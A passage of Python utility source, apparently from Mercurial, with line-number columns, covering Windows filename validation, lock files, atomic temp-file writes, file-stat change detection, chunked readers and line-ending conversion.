2042 2045 "filename contains 'con', which is reserved on Windows"
2043 2046 >>> checkwinfilename(b"foo/bar/xml.con")
2044 2047 >>> checkwinfilename(b"foo/bar/AUX/bla.txt")
2045 2048 "filename contains 'AUX', which is reserved on Windows"
2046 2049 >>> checkwinfilename(b"foo/bar/bla:.txt")
2047 2050 "filename contains ':', which is reserved on Windows"
2048 2051 >>> checkwinfilename(b"foo/bar/b\07la.txt")
2049 2052 "filename contains '\\x07', which is invalid on Windows"
2050 2053 >>> checkwinfilename(b"foo/bar/bla ")
2051 2054 "filename ends with ' ', which is not allowed on Windows"
2052 2055 >>> checkwinfilename(b"../bar")
2053 2056 >>> checkwinfilename(b"foo\\")
2054 2057 "filename ends with '\\', which is invalid on Windows"
2055 2058 >>> checkwinfilename(b"foo\\/bar")
2056 2059 "directory name ends with '\\', which is invalid on Windows"
2057 2060 """
2058 2061 if path.endswith(b'\\'):
2059 2062 return _(b"filename ends with '\\', which is invalid on Windows")
2060 2063 if b'\\/' in path:
2061 2064 return _(b"directory name ends with '\\', which is invalid on Windows")
2062 2065 for n in path.replace(b'\\', b'/').split(b'/'):
2063 2066 if not n:
2064 2067 continue
2065 2068 for c in _filenamebytestr(n):
2066 2069 if c in _winreservedchars:
2067 2070 return (
2068 2071 _(
2069 2072 b"filename contains '%s', which is reserved "
2070 2073 b"on Windows"
2071 2074 )
2072 2075 % c
2073 2076 )
2074 2077 if ord(c) <= 31:
2075 2078 return _(
2076 2079 b"filename contains '%s', which is invalid on Windows"
2077 2080 ) % stringutil.escapestr(c)
2078 2081 base = n.split(b'.')[0]
2079 2082 if base and base.lower() in _winreservednames:
2080 2083 return (
2081 2084 _(b"filename contains '%s', which is reserved on Windows")
2082 2085 % base
2083 2086 )
2084 2087 t = n[-1:]
2085 2088 if t in b'. ' and n not in b'..':
2086 2089 return (
2087 2090 _(
2088 2091 b"filename ends with '%s', which is not allowed "
2089 2092 b"on Windows"
2090 2093 )
2091 2094 % t
2092 2095 )
2093 2096
2094 2097
2095 2098 timer = getattr(time, "perf_counter", None)
2096 2099
2097 2100 if pycompat.iswindows:
2098 2101 checkosfilename = checkwinfilename
2099 2102 if not timer:
2100 2103 timer = time.clock
2101 2104 else:
2102 2105 # mercurial.windows doesn't have platform.checkosfilename
2103 2106 checkosfilename = platform.checkosfilename # pytype: disable=module-attr
2104 2107 if not timer:
2105 2108 timer = time.time
2106 2109
2107 2110
2108 2111 def makelock(info, pathname):
2109 2112 """Create a lock file atomically if possible
2110 2113
2111 2114 This may leave a stale lock file if symlink isn't supported and signal
2112 2115 interrupt is enabled.
2113 2116 """
2114 2117 try:
2115 2118 return os.symlink(info, pathname)
2116 2119 except OSError as why:
2117 2120 if why.errno == errno.EEXIST:
2118 2121 raise
2119 2122 except AttributeError: # no symlink in os
2120 2123 pass
2121 2124
2122 2125 flags = os.O_CREAT | os.O_WRONLY | os.O_EXCL | getattr(os, 'O_BINARY', 0)
2123 2126 ld = os.open(pathname, flags)
2124 2127 os.write(ld, info)
2125 2128 os.close(ld)
2126 2129
2127 2130
2128 2131 def readlock(pathname):
2129 2132 # type: (bytes) -> bytes
2130 2133 try:
2131 2134 return readlink(pathname)
2132 2135 except OSError as why:
2133 2136 if why.errno not in (errno.EINVAL, errno.ENOSYS):
2134 2137 raise
2135 2138 except AttributeError: # no symlink in os
2136 2139 pass
2137 2140 with posixfile(pathname, b'rb') as fp:
2138 2141 return fp.read()
2139 2142
2140 2143
2141 2144 def fstat(fp):
2142 2145 '''stat file object that may not have fileno method.'''
2143 2146 try:
2144 2147 return os.fstat(fp.fileno())
2145 2148 except AttributeError:
2146 2149 return os.stat(fp.name)
2147 2150
2148 2151
2149 2152 # File system features
2150 2153
2151 2154
2152 2155 def fscasesensitive(path):
2153 2156 # type: (bytes) -> bool
2154 2157 """
2155 2158 Return true if the given path is on a case-sensitive filesystem
2156 2159
2157 2160 Requires a path (like /foo/.hg) ending with a foldable final
2158 2161 directory component.
2159 2162 """
2160 2163 s1 = os.lstat(path)
2161 2164 d, b = os.path.split(path)
2162 2165 b2 = b.upper()
2163 2166 if b == b2:
2164 2167 b2 = b.lower()
2165 2168 if b == b2:
2166 2169 return True # no evidence against case sensitivity
2167 2170 p2 = os.path.join(d, b2)
2168 2171 try:
2169 2172 s2 = os.lstat(p2)
2170 2173 if s2 == s1:
2171 2174 return False
2172 2175 return True
2173 2176 except OSError:
2174 2177 return True
2175 2178
2176 2179
2177 2180 try:
2178 2181 import re2 # pytype: disable=import-error
2179 2182
2180 2183 _re2 = None
2181 2184 except ImportError:
2182 2185 _re2 = False
2183 2186
2184 2187
2185 2188 class _re(object):
2186 2189 def _checkre2(self):
2187 2190 global _re2
2188 2191 try:
2189 2192 # check if match works, see issue3964
2190 2193 _re2 = bool(re2.match(br'\[([^\[]+)\]', b'[ui]'))
2191 2194 except ImportError:
2192 2195 _re2 = False
2193 2196
2194 2197 def compile(self, pat, flags=0):
2195 2198 """Compile a regular expression, using re2 if possible
2196 2199
2197 2200 For best performance, use only re2-compatible regexp features. The
2198 2201 only flags from the re module that are re2-compatible are
2199 2202 IGNORECASE and MULTILINE."""
2200 2203 if _re2 is None:
2201 2204 self._checkre2()
2202 2205 if _re2 and (flags & ~(remod.IGNORECASE | remod.MULTILINE)) == 0:
2203 2206 if flags & remod.IGNORECASE:
2204 2207 pat = b'(?i)' + pat
2205 2208 if flags & remod.MULTILINE:
2206 2209 pat = b'(?m)' + pat
2207 2210 try:
2208 2211 return re2.compile(pat)
2209 2212 except re2.error:
2210 2213 pass
2211 2214 return remod.compile(pat, flags)
2212 2215
2213 2216 @propertycache
2214 2217 def escape(self):
2215 2218 """Return the version of escape corresponding to self.compile.
2216 2219
2217 2220 This is imperfect because whether re2 or re is used for a particular
2218 2221 function depends on the flags, etc, but it's the best we can do.
2219 2222 """
2220 2223 global _re2
2221 2224 if _re2 is None:
2222 2225 self._checkre2()
2223 2226 if _re2:
2224 2227 return re2.escape
2225 2228 else:
2226 2229 return remod.escape
2227 2230
2228 2231
2229 2232 re = _re()
2230 2233
2231 2234 _fspathcache = {}
2232 2235
2233 2236
2234 2237 def fspath(name, root):
2235 2238 # type: (bytes, bytes) -> bytes
2236 2239 """Get name in the case stored in the filesystem
2237 2240
2238 2241 The name should be relative to root, and be normcase-ed for efficiency.
2239 2242
2240 2243 Note that this function is unnecessary, and should not be
2241 2244 called, for case-sensitive filesystems (simply because it's expensive).
2242 2245
2243 2246 The root should be normcase-ed, too.
2244 2247 """
2245 2248
2246 2249 def _makefspathcacheentry(dir):
2247 2250 return {normcase(n): n for n in os.listdir(dir)}
2248 2251
2249 2252 seps = pycompat.ossep
2250 2253 if pycompat.osaltsep:
2251 2254 seps = seps + pycompat.osaltsep
2252 2255 # Protect backslashes. This gets silly very quickly.
2253 2256 seps.replace(b'\\', b'\\\\')
2254 2257 pattern = remod.compile(br'([^%s]+)|([%s]+)' % (seps, seps))
2255 2258 dir = os.path.normpath(root)
2256 2259 result = []
2257 2260 for part, sep in pattern.findall(name):
2258 2261 if sep:
2259 2262 result.append(sep)
2260 2263 continue
2261 2264
2262 2265 if dir not in _fspathcache:
2263 2266 _fspathcache[dir] = _makefspathcacheentry(dir)
2264 2267 contents = _fspathcache[dir]
2265 2268
2266 2269 found = contents.get(part)
2267 2270 if not found:
2268 2271 # retry "once per directory" per "dirstate.walk" which
2269 2272 # may take place for each patches of "hg qpush", for example
2270 2273 _fspathcache[dir] = contents = _makefspathcacheentry(dir)
2271 2274 found = contents.get(part)
2272 2275
2273 2276 result.append(found or part)
2274 2277 dir = os.path.join(dir, part)
2275 2278
2276 2279 return b''.join(result)
2277 2280
2278 2281
2279 2282 def checknlink(testfile):
2280 2283 # type: (bytes) -> bool
2281 2284 '''check whether hardlink count reporting works properly'''
2282 2285
2283 2286 # testfile may be open, so we need a separate file for checking to
2284 2287 # work around issue2543 (or testfile may get lost on Samba shares)
2285 2288 f1, f2, fp = None, None, None
2286 2289 try:
2287 2290 fd, f1 = pycompat.mkstemp(
2288 2291 prefix=b'.%s-' % os.path.basename(testfile),
2289 2292 suffix=b'1~',
2290 2293 dir=os.path.dirname(testfile),
2291 2294 )
2292 2295 os.close(fd)
2293 2296 f2 = b'%s2~' % f1[:-2]
2294 2297
2295 2298 oslink(f1, f2)
2296 2299 # nlinks() may behave differently for files on Windows shares if
2297 2300 # the file is open.
2298 2301 fp = posixfile(f2)
2299 2302 return nlinks(f2) > 1
2300 2303 except OSError:
2301 2304 return False
2302 2305 finally:
2303 2306 if fp is not None:
2304 2307 fp.close()
2305 2308 for f in (f1, f2):
2306 2309 try:
2307 2310 if f is not None:
2308 2311 os.unlink(f)
2309 2312 except OSError:
2310 2313 pass
2311 2314
2312 2315
2313 2316 def endswithsep(path):
2314 2317 # type: (bytes) -> bool
2315 2318 '''Check path ends with os.sep or os.altsep.'''
2316 2319 return bool( # help pytype
2317 2320 path.endswith(pycompat.ossep)
2318 2321 or pycompat.osaltsep
2319 2322 and path.endswith(pycompat.osaltsep)
2320 2323 )
2321 2324
2322 2325
2323 2326 def splitpath(path):
2324 2327 # type: (bytes) -> List[bytes]
2325 2328 """Split path by os.sep.
2326 2329 Note that this function does not use os.altsep because this is
2327 2330 an alternative of simple "xxx.split(os.sep)".
2328 2331 It is recommended to use os.path.normpath() before using this
2329 2332 function if need."""
2330 2333 return path.split(pycompat.ossep)
2331 2334
2332 2335
2333 2336 def mktempcopy(name, emptyok=False, createmode=None, enforcewritable=False):
2334 2337 """Create a temporary file with the same contents from name
2335 2338
2336 2339 The permission bits are copied from the original file.
2337 2340
2338 2341 If the temporary file is going to be truncated immediately, you
2339 2342 can use emptyok=True as an optimization.
2340 2343
2341 2344 Returns the name of the temporary file.
2342 2345 """
2343 2346 d, fn = os.path.split(name)
2344 2347 fd, temp = pycompat.mkstemp(prefix=b'.%s-' % fn, suffix=b'~', dir=d)
2345 2348 os.close(fd)
2346 2349 # Temporary files are created with mode 0600, which is usually not
2347 2350 # what we want. If the original file already exists, just copy
2348 2351 # its mode. Otherwise, manually obey umask.
2349 2352 copymode(name, temp, createmode, enforcewritable)
2350 2353
2351 2354 if emptyok:
2352 2355 return temp
2353 2356 try:
2354 2357 try:
2355 2358 ifp = posixfile(name, b"rb")
2356 2359 except IOError as inst:
2357 2360 if inst.errno == errno.ENOENT:
2358 2361 return temp
2359 2362 if not getattr(inst, 'filename', None):
2360 2363 inst.filename = name
2361 2364 raise
2362 2365 ofp = posixfile(temp, b"wb")
2363 2366 for chunk in filechunkiter(ifp):
2364 2367 ofp.write(chunk)
2365 2368 ifp.close()
2366 2369 ofp.close()
2367 2370 except: # re-raises
2368 2371 try:
2369 2372 os.unlink(temp)
2370 2373 except OSError:
2371 2374 pass
2372 2375 raise
2373 2376 return temp
2374 2377
2375 2378
2376 2379 class filestat(object):
2377 2380 """help to exactly detect change of a file
2378 2381
2379 2382 'stat' attribute is result of 'os.stat()' if specified 'path'
2380 2383 exists. Otherwise, it is None. This can avoid preparative
2381 2384 'exists()' examination on client side of this class.
2382 2385 """
2383 2386
2384 2387 def __init__(self, stat):
2385 2388 self.stat = stat
2386 2389
2387 2390 @classmethod
2388 2391 def frompath(cls, path):
2389 2392 try:
2390 2393 stat = os.stat(path)
2391 2394 except OSError as err:
2392 2395 if err.errno != errno.ENOENT:
2393 2396 raise
2394 2397 stat = None
2395 2398 return cls(stat)
2396 2399
2397 2400 @classmethod
2398 2401 def fromfp(cls, fp):
2399 2402 stat = os.fstat(fp.fileno())
2400 2403 return cls(stat)
2401 2404
2402 2405 __hash__ = object.__hash__
2403 2406
2404 2407 def __eq__(self, old):
2405 2408 try:
2406 2409 # if ambiguity between stat of new and old file is
2407 2410 # avoided, comparison of size, ctime and mtime is enough
2408 2411 # to exactly detect change of a file regardless of platform
2409 2412 return (
2410 2413 self.stat.st_size == old.stat.st_size
2411 2414 and self.stat[stat.ST_CTIME] == old.stat[stat.ST_CTIME]
2412 2415 and self.stat[stat.ST_MTIME] == old.stat[stat.ST_MTIME]
2413 2416 )
2414 2417 except AttributeError:
2415 2418 pass
2416 2419 try:
2417 2420 return self.stat is None and old.stat is None
2418 2421 except AttributeError:
2419 2422 return False
2420 2423
2421 2424 def isambig(self, old):
2422 2425 """Examine whether new (= self) stat is ambiguous against old one
2423 2426
2424 2427 "S[N]" below means stat of a file at N-th change:
2425 2428
2426 2429 - S[n-1].ctime < S[n].ctime: can detect change of a file
2427 2430 - S[n-1].ctime == S[n].ctime
2428 2431 - S[n-1].ctime < S[n].mtime: means natural advancing (*1)
2429 2432 - S[n-1].ctime == S[n].mtime: is ambiguous (*2)
2430 2433 - S[n-1].ctime > S[n].mtime: never occurs naturally (don't care)
2431 2434 - S[n-1].ctime > S[n].ctime: never occurs naturally (don't care)
2432 2435
2433 2436 Case (*2) above means that a file was changed twice or more at
2434 2437 same time in sec (= S[n-1].ctime), and comparison of timestamp
2435 2438 is ambiguous.
2436 2439
2437 2440 Base idea to avoid such ambiguity is "advance mtime 1 sec, if
2438 2441 timestamp is ambiguous".
2439 2442
2440 2443 But advancing mtime only in case (*2) doesn't work as
2441 2444 expected, because naturally advanced S[n].mtime in case (*1)
2442 2445 might be equal to manually advanced S[n-1 or earlier].mtime.
2443 2446
2444 2447 Therefore, all "S[n-1].ctime == S[n].ctime" cases should be
2445 2448 treated as ambiguous regardless of mtime, to avoid overlooking
2446 2449 by confliction between such mtime.
2447 2450
2448 2451 Advancing mtime "if isambig(oldstat)" ensures "S[n-1].mtime !=
2449 2452 S[n].mtime", even if size of a file isn't changed.
2450 2453 """
2451 2454 try:
2452 2455 return self.stat[stat.ST_CTIME] == old.stat[stat.ST_CTIME]
2453 2456 except AttributeError:
2454 2457 return False
2455 2458
2456 2459 def avoidambig(self, path, old):
2457 2460 """Change file stat of specified path to avoid ambiguity
2458 2461
2459 2462 'old' should be previous filestat of 'path'.
2460 2463
2461 2464 This skips avoiding ambiguity, if a process doesn't have
2462 2465 appropriate privileges for 'path'. This returns False in this
2463 2466 case.
2464 2467
2465 2468 Otherwise, this returns True, as "ambiguity is avoided".
2466 2469 """
2467 2470 advanced = (old.stat[stat.ST_MTIME] + 1) & 0x7FFFFFFF
2468 2471 try:
2469 2472 os.utime(path, (advanced, advanced))
2470 2473 except OSError as inst:
2471 2474 if inst.errno == errno.EPERM:
2472 2475 # utime() on the file created by another user causes EPERM,
2473 2476 # if a process doesn't have appropriate privileges
2474 2477 return False
2475 2478 raise
2476 2479 return True
2477 2480
2478 2481 def __ne__(self, other):
2479 2482 return not self == other
2480 2483
2481 2484
2482 2485 class atomictempfile(object):
2483 2486 """writable file object that atomically updates a file
2484 2487
2485 2488 All writes will go to a temporary copy of the original file. Call
2486 2489 close() when you are done writing, and atomictempfile will rename
2487 2490 the temporary copy to the original name, making the changes
2488 2491 visible. If the object is destroyed without being closed, all your
2489 2492 writes are discarded.
2490 2493
2491 2494 checkambig argument of constructor is used with filestat, and is
2492 2495 useful only if target file is guarded by any lock (e.g. repo.lock
2493 2496 or repo.wlock).
2494 2497 """
2495 2498
2496 2499 def __init__(self, name, mode=b'w+b', createmode=None, checkambig=False):
2497 2500 self.__name = name # permanent name
2498 2501 self._tempname = mktempcopy(
2499 2502 name,
2500 2503 emptyok=(b'w' in mode),
2501 2504 createmode=createmode,
2502 2505 enforcewritable=(b'w' in mode),
2503 2506 )
2504 2507
2505 2508 self._fp = posixfile(self._tempname, mode)
2506 2509 self._checkambig = checkambig
2507 2510
2508 2511 # delegated methods
2509 2512 self.read = self._fp.read
2510 2513 self.write = self._fp.write
2511 2514 self.seek = self._fp.seek
2512 2515 self.tell = self._fp.tell
2513 2516 self.fileno = self._fp.fileno
2514 2517
2515 2518 def close(self):
2516 2519 if not self._fp.closed:
2517 2520 self._fp.close()
2518 2521 filename = localpath(self.__name)
2519 2522 oldstat = self._checkambig and filestat.frompath(filename)
2520 2523 if oldstat and oldstat.stat:
2521 2524 rename(self._tempname, filename)
2522 2525 newstat = filestat.frompath(filename)
2523 2526 if newstat.isambig(oldstat):
2524 2527 # stat of changed file is ambiguous to original one
2525 2528 advanced = (oldstat.stat[stat.ST_MTIME] + 1) & 0x7FFFFFFF
2526 2529 os.utime(filename, (advanced, advanced))
2527 2530 else:
2528 2531 rename(self._tempname, filename)
2529 2532
2530 2533 def discard(self):
2531 2534 if not self._fp.closed:
2532 2535 try:
2533 2536 os.unlink(self._tempname)
2534 2537 except OSError:
2535 2538 pass
2536 2539 self._fp.close()
2537 2540
2538 2541 def __del__(self):
2539 2542 if safehasattr(self, '_fp'): # constructor actually did something
2540 2543 self.discard()
2541 2544
2542 2545 def __enter__(self):
2543 2546 return self
2544 2547
2545 2548 def __exit__(self, exctype, excvalue, traceback):
2546 2549 if exctype is not None:
2547 2550 self.discard()
2548 2551 else:
2549 2552 self.close()
2550 2553
2551 2554
2552 2555 def unlinkpath(f, ignoremissing=False, rmdir=True):
2553 2556 # type: (bytes, bool, bool) -> None
2554 2557 """unlink and remove the directory if it is empty"""
2555 2558 if ignoremissing:
2556 2559 tryunlink(f)
2557 2560 else:
2558 2561 unlink(f)
2559 2562 if rmdir:
2560 2563 # try removing directories that might now be empty
2561 2564 try:
2562 2565 removedirs(os.path.dirname(f))
2563 2566 except OSError:
2564 2567 pass
2565 2568
2566 2569
2567 2570 def tryunlink(f):
2568 2571 # type: (bytes) -> None
2569 2572 """Attempt to remove a file, ignoring ENOENT errors."""
2570 2573 try:
2571 2574 unlink(f)
2572 2575 except OSError as e:
2573 2576 if e.errno != errno.ENOENT:
2574 2577 raise
2575 2578
2576 2579
2577 2580 def makedirs(name, mode=None, notindexed=False):
2578 2581 # type: (bytes, Optional[int], bool) -> None
2579 2582 """recursive directory creation with parent mode inheritance
2580 2583
2581 2584 Newly created directories are marked as "not to be indexed by
2582 2585 the content indexing service", if ``notindexed`` is specified
2583 2586 for "write" mode access.
2584 2587 """
2585 2588 try:
2586 2589 makedir(name, notindexed)
2587 2590 except OSError as err:
2588 2591 if err.errno == errno.EEXIST:
2589 2592 return
2590 2593 if err.errno != errno.ENOENT or not name:
2591 2594 raise
2592 2595 parent = os.path.dirname(os.path.abspath(name))
2593 2596 if parent == name:
2594 2597 raise
2595 2598 makedirs(parent, mode, notindexed)
2596 2599 try:
2597 2600 makedir(name, notindexed)
2598 2601 except OSError as err:
2599 2602 # Catch EEXIST to handle races
2600 2603 if err.errno == errno.EEXIST:
2601 2604 return
2602 2605 raise
2603 2606 if mode is not None:
2604 2607 os.chmod(name, mode)
2605 2608
2606 2609
2607 2610 def readfile(path):
2608 2611 # type: (bytes) -> bytes
2609 2612 with open(path, b'rb') as fp:
2610 2613 return fp.read()
2611 2614
2612 2615
2613 2616 def writefile(path, text):
2614 2617 # type: (bytes, bytes) -> None
2615 2618 with open(path, b'wb') as fp:
2616 2619 fp.write(text)
2617 2620
2618 2621
2619 2622 def appendfile(path, text):
2620 2623 # type: (bytes, bytes) -> None
2621 2624 with open(path, b'ab') as fp:
2622 2625 fp.write(text)
2623 2626
2624 2627
2625 2628 class chunkbuffer(object):
2626 2629 """Allow arbitrary sized chunks of data to be efficiently read from an
2627 2630 iterator over chunks of arbitrary size."""
2628 2631
2629 2632 def __init__(self, in_iter):
2630 2633 """in_iter is the iterator that's iterating over the input chunks."""
2631 2634
2632 2635 def splitbig(chunks):
2633 2636 for chunk in chunks:
2634 2637 if len(chunk) > 2 ** 20:
2635 2638 pos = 0
2636 2639 while pos < len(chunk):
2637 2640 end = pos + 2 ** 18
2638 2641 yield chunk[pos:end]
2639 2642 pos = end
2640 2643 else:
2641 2644 yield chunk
2642 2645
2643 2646 self.iter = splitbig(in_iter)
2644 2647 self._queue = collections.deque()
2645 2648 self._chunkoffset = 0
2646 2649
2647 2650 def read(self, l=None):
2648 2651 """Read L bytes of data from the iterator of chunks of data.
2649 2652 Returns less than L bytes if the iterator runs dry.
2650 2653
2651 2654 If size parameter is omitted, read everything"""
2652 2655 if l is None:
2653 2656 return b''.join(self.iter)
2654 2657
2655 2658 left = l
2656 2659 buf = []
2657 2660 queue = self._queue
2658 2661 while left > 0:
2659 2662 # refill the queue
2660 2663 if not queue:
2661 2664 target = 2 ** 18
2662 2665 for chunk in self.iter:
2663 2666 queue.append(chunk)
2664 2667 target -= len(chunk)
2665 2668 if target <= 0:
2666 2669 break
2667 2670 if not queue:
2668 2671 break
2669 2672
2670 2673 # The easy way to do this would be to queue.popleft(), modify the
2671 2674 # chunk (if necessary), then queue.appendleft(). However, for cases
2672 2675 # where we read partial chunk content, this incurs 2 dequeue
2673 2676 # mutations and creates a new str for the remaining chunk in the
2674 2677 # queue. Our code below avoids this overhead.
2675 2678
2676 2679 chunk = queue[0]
2677 2680 chunkl = len(chunk)
2678 2681 offset = self._chunkoffset
2679 2682
2680 2683 # Use full chunk.
2681 2684 if offset == 0 and left >= chunkl:
2682 2685 left -= chunkl
2683 2686 queue.popleft()
2684 2687 buf.append(chunk)
2685 2688 # self._chunkoffset remains at 0.
2686 2689 continue
2687 2690
2688 2691 chunkremaining = chunkl - offset
2689 2692
2690 2693 # Use all of unconsumed part of chunk.
2691 2694 if left >= chunkremaining:
2692 2695 left -= chunkremaining
2693 2696 queue.popleft()
2694 2697 # offset == 0 is enabled by block above, so this won't merely
2695 2698 # copy via ``chunk[0:]``.
2696 2699 buf.append(chunk[offset:])
2697 2700 self._chunkoffset = 0
2698 2701
2699 2702 # Partial chunk needed.
2700 2703 else:
2701 2704 buf.append(chunk[offset : offset + left])
2702 2705 self._chunkoffset += left
2703 2706 left -= chunkremaining
2704 2707
2705 2708 return b''.join(buf)
2706 2709
2707 2710
2708 2711 def filechunkiter(f, size=131072, limit=None):
2709 2712 """Create a generator that produces the data in the file size
2710 2713 (default 131072) bytes at a time, up to optional limit (default is
2711 2714 to read all data). Chunks may be less than size bytes if the
2712 2715 chunk is the last chunk in the file, or the file is a socket or
2713 2716 some other type of file that sometimes reads less data than is
2714 2717 requested."""
2715 2718 assert size >= 0
2716 2719 assert limit is None or limit >= 0
2717 2720 while True:
2718 2721 if limit is None:
2719 2722 nbytes = size
2720 2723 else:
2721 2724 nbytes = min(limit, size)
2722 2725 s = nbytes and f.read(nbytes)
2723 2726 if not s:
2724 2727 break
2725 2728 if limit:
2726 2729 limit -= len(s)
2727 2730 yield s
2728 2731
2729 2732
2730 2733 class cappedreader(object):
2731 2734 """A file object proxy that allows reading up to N bytes.
2732 2735
2733 2736 Given a source file object, instances of this type allow reading up to
2734 2737 N bytes from that source file object. Attempts to read past the allowed
2735 2738 limit are treated as EOF.
2736 2739
2737 2740 It is assumed that I/O is not performed on the original file object
2738 2741 in addition to I/O that is performed by this instance. If there is,
2739 2742 state tracking will get out of sync and unexpected results will ensue.
2740 2743 """
2741 2744
2742 2745 def __init__(self, fh, limit):
2743 2746 """Allow reading up to <limit> bytes from <fh>."""
2744 2747 self._fh = fh
2745 2748 self._left = limit
2746 2749
2747 2750 def read(self, n=-1):
2748 2751 if not self._left:
2749 2752 return b''
2750 2753
2751 2754 if n < 0:
2752 2755 n = self._left
2753 2756
2754 2757 data = self._fh.read(min(n, self._left))
2755 2758 self._left -= len(data)
2756 2759 assert self._left >= 0
2757 2760
2758 2761 return data
2759 2762
2760 2763 def readinto(self, b):
2761 2764 res = self.read(len(b))
2762 2765 if res is None:
2763 2766 return None
2764 2767
2765 2768 b[0 : len(res)] = res
2766 2769 return len(res)
2767 2770
2768 2771
2769 2772 def unitcountfn(*unittable):
2770 2773 '''return a function that renders a readable count of some quantity'''
2771 2774
2772 2775 def go(count):
2773 2776 for multiplier, divisor, format in unittable:
2774 2777 if abs(count) >= divisor * multiplier:
2775 2778 return format % (count / float(divisor))
2776 2779 return unittable[-1][2] % count
2777 2780
2778 2781 return go
2779 2782
2780 2783
2781 2784 def processlinerange(fromline, toline):
2782 2785 # type: (int, int) -> Tuple[int, int]
2783 2786 """Check that linerange <fromline>:<toline> makes sense and return a
2784 2787 0-based range.
2785 2788
2786 2789 >>> processlinerange(10, 20)
2787 2790 (9, 20)
2788 2791 >>> processlinerange(2, 1)
2789 2792 Traceback (most recent call last):
2790 2793 ...
2791 2794 ParseError: line range must be positive
2792 2795 >>> processlinerange(0, 5)
2793 2796 Traceback (most recent call last):
2794 2797 ...
2795 2798 ParseError: fromline must be strictly positive
2796 2799 """
2797 2800 if toline - fromline < 0:
2798 2801 raise error.ParseError(_(b"line range must be positive"))
2799 2802 if fromline < 1:
2800 2803 raise error.ParseError(_(b"fromline must be strictly positive"))
2801 2804 return fromline - 1, toline
2802 2805
2803 2806
2804 2807 bytecount = unitcountfn(
2805 2808 (100, 1 << 30, _(b'%.0f GB')),
2806 2809 (10, 1 << 30, _(b'%.1f GB')),
2807 2810 (1, 1 << 30, _(b'%.2f GB')),
2808 2811 (100, 1 << 20, _(b'%.0f MB')),
2809 2812 (10, 1 << 20, _(b'%.1f MB')),
2810 2813 (1, 1 << 20, _(b'%.2f MB')),
2811 2814 (100, 1 << 10, _(b'%.0f KB')),
2812 2815 (10, 1 << 10, _(b'%.1f KB')),
2813 2816 (1, 1 << 10, _(b'%.2f KB')),
2814 2817 (1, 1, _(b'%.0f bytes')),
2815 2818 )
2816 2819
2817 2820
2818 2821 class transformingwriter(object):
2819 2822 """Writable file wrapper to transform data by function"""
2820 2823
2821 2824 def __init__(self, fp, encode):
2822 2825 self._fp = fp
2823 2826 self._encode = encode
2824 2827
2825 2828 def close(self):
2826 2829 self._fp.close()
2827 2830
2828 2831 def flush(self):
2829 2832 self._fp.flush()
2830 2833
2831 2834 def write(self, data):
2832 2835 return self._fp.write(self._encode(data))
2833 2836
2834 2837
2835 2838 # Matches a single EOL which can either be a CRLF where repeated CR
2836 2839 # are removed or a LF. We do not care about old Macintosh files, so a
2837 2840 # stray CR is an error.
2838 2841 _eolre = remod.compile(br'\r*\n')
2839 2842
2840 2843
2841 2844 def tolf(s):
2842 2845 # type: (bytes) -> bytes
2843 2846 return _eolre.sub(b'\n', s)
2844 2847
2845 2848
2846 2849 def tocrlf(s):
2847 2850 # type: (bytes) -> bytes
2848 2851 return _eolre.sub(b'\r\n', s)
2849 2852
2850 2853
2851 2854 def _crlfwriter(fp):
2852 2855 return transformingwriter(fp, tocrlf)
2853 2856
2854 2857
2855 2858 if pycompat.oslinesep == b'\r\n':
2856 2859 tonativeeol = tocrlf
2857 2860 fromnativeeol = tolf
2858 2861 nativeeolwriter = _crlfwriter
2859 2862 else:
2860 2863 tonativeeol = pycompat.identity
2861 2864 fromnativeeol = pycompat.identity
2862 2865 nativeeolwriter = pycompat.identity
2863 2866
2864 2867 if pyplatform.python_implementation() == b'CPython' and sys.version_info < (
2865 2868 3,
2866 2869 0,
2867 2870 ):
2868 2871 # There is an issue in CPython that some IO methods do not handle EINTR
2869 2872 # correctly. The following table shows what CPython version (and functions)
2870 2873 # are affected (buggy: has the EINTR bug, okay: otherwise):
2871 2874 #
2872 2875 # | < 2.7.4 | 2.7.4 to 2.7.12 | >= 3.0
2873 2876 # --------------------------------------------------
2874 2877 # fp.__iter__ | buggy | buggy | okay
2875 2878 # fp.read* | buggy | okay [1] | okay
2876 2879 #
2877 2880 # [1]: fixed by changeset 67dc99a989cd in the cpython hg repo.
2878 2881 #
2879 2882 # Here we workaround the EINTR issue for fileobj.__iter__. Other methods
2880 2883 # like "read*" work fine, as we do not support Python < 2.7.4.
2881 2884 #
2882 2885 # Although we can workaround the EINTR issue for fp.__iter__, it is slower:
2883 2886 # "for x in fp" is 4x faster than "for x in iter(fp.readline, '')" in
2884 2887 # CPython 2, because CPython 2 maintains an internal readahead buffer for
2885 2888 # fp.__iter__ but not other fp.read* methods.
2886 2889 #
2887 2890 # On modern systems like Linux, the "read" syscall cannot be interrupted
2888 2891 # when reading "fast" files like on-disk files. So the EINTR issue only
2889 2892 # affects things like pipes, sockets, ttys etc. We treat "normal" (S_ISREG)
2890 2893 # files approximately as "fast" files and use the fast (unsafe) code path,
2891 2894 # to minimize the performance impact.
2892 2895
2893 2896 def iterfile(fp):
2894 2897 fastpath = True
2895 2898 if type(fp) is file:
2896 2899 fastpath = stat.S_ISREG(os.fstat(fp.fileno()).st_mode)
2897 2900 if fastpath:
2898 2901 return fp
2899 2902 else:
2900 2903 # fp.readline deals with EINTR correctly, use it as a workaround.
2901 2904 return iter(fp.readline, b'')
2902 2905
2903 2906
2904 2907 else:
2905 2908 # PyPy and CPython 3 do not have the EINTR issue thus no workaround needed.
2906 2909 def iterfile(fp):
2907 2910 return fp
2908 2911
2909 2912
2910 2913 def iterlines(iterator):
2911 2914 # type: (Iterator[bytes]) -> Iterator[bytes]
2912 2915 for chunk in iterator:
2913 2916 for line in chunk.splitlines():
2914 2917 yield line
2915 2918
2916 2919
2917 2920 def expandpath(path):
2918 2921 # type: (bytes) -> bytes
2919 2922 return os.path.expanduser(os.path.expandvars(path))
2920 2923
2921 2924
2922 2925 def interpolate(prefix, mapping, s, fn=None, escape_prefix=False):
2923 2926 """Return the result of interpolating items in the mapping into string s.
2924 2927
2925 2928 prefix is a single character string, or a two character string with
2926 2929 a backslash as the first character if the prefix needs to be escaped in
2927 2930 a regular expression.
2928 2931
2929 2932 fn is an optional function that will be applied to the replacement text
2930 2933 just before replacement.
2931 2934
2932 2935 escape_prefix is an optional flag that allows using doubled prefix for
2933 2936 its escaping.
2934 2937 """
2935 2938 fn = fn or (lambda s: s)
2936 2939 patterns = b'|'.join(mapping.keys())
2937 2940 if escape_prefix:
2938 2941 patterns += b'|' + prefix
2939 2942 if len(prefix) > 1:
2940 2943 prefix_char = prefix[1:]
2941 2944 else:
2942 2945 prefix_char = prefix
2943 2946 mapping[prefix_char] = prefix_char
